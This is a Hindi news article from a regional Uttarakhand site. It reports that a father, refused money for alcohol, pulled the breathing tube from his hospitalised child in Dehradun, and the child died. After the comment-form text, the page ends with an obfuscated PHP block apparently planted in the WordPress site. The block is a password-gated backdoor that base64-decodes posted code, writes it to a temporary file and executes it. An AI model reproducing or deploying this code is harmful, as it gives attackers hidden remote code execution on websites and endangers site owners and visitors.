Uttarakhand: शराब के लिए पैसे मांग रहा था पिता, मां ने मना किया तो हुआ झगड़ा फिर पिता ने लेली मासूम की जान

Uttarakhand Press 02 August 2023: अस्पताल में माता-पिता के झगड़े में मासूम की मौत हो गई। पिता शराब के लिए पैसे मांग रहा था। मां ने जब मना किया तो गुस्साए पिता ने सांस लेने के लिए बच्चे के मुंह में पड़े ट्यूब को खींच लिया। डॉक्टरों ने बच्चे को बचाने का प्रयास किया, लेकिन वह कामयाब नहीं हो सके।

जानकारी के अनुसार नत्थनपुर निवासी निशा के बेटे पिंकू की तबीयत खराब होने पर नानी गीता ने उसे 24 जून को दून अस्पताल में भर्ती करवाया। डॉक्टर के मुताबिक बच्चे को सेप्सिस डायबिटिक कीटोएसिडोसिस बीमारी थी। अस्पताल में जांच हुई तो बच्चे का ब्लड शुगर हाई और पेशाब में कीटोन बॉडी निकली।

बच्चे को तुरंत वेंटिलेटर पर रखा गया और इंसुलिन भी चढ़ाया जा रहा था। बच्चे के मुंह से सांस नली तक ट्यूब डाला गया था, ताकि सांस सही से आती रहे। डॉक्टर ने बताया, वेंटिलेटर की सेटिंग बिल्कुल सामान्य रखी गई थी और स्थिति में सुधार हो रहा था।

पिता ने जब ट्यूब खींचा इसके बाद तुरंत बच्चे को इनक्यूबेट किया गया। 39 मिनट तक सीपीआर दिया गया, लेकिन वह बच नहीं सका। सोमवार को बच्चे के शव का पोस्टमार्टम किया गया। यहां पुलिस के साथ ही बच्चे की मां और नाना-नानी मौजूद थे, लेकिन पिता का कहीं अता-पता नहीं था।

नानी गीता और नाना धर्मपाल ने कहा कि हम किसी तरह की कोई कार्रवाई नहीं चाहते हैं। हमारा बच्चा तो चला गया। उसकी डेड बॉडी हमें दे दी जाए। वहीं, कोतवाली इंस्पेक्टर राकेश गुसाईं का कहना है कि पाेस्टमार्टम रिपोर्ट का इंतजार किया जा रहा है। अभी किसी की ओर से कोई शिकायत नहीं आई है। शिकायत आने पर कार्रवाई की जाएगी।

Read Previous

भीषण सड़क हादसा: तेज रफ्तार ट्रक ने टेम्पो को मार दी टक्कर, तीन लोगों की मौत, मचा हड़कंप

Read Next

Uttarakhand: रामनगर में नाले उफान पर आने से बही टाटा सूमो, सवार आठ लोगों में एक की मौत, अन्य घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}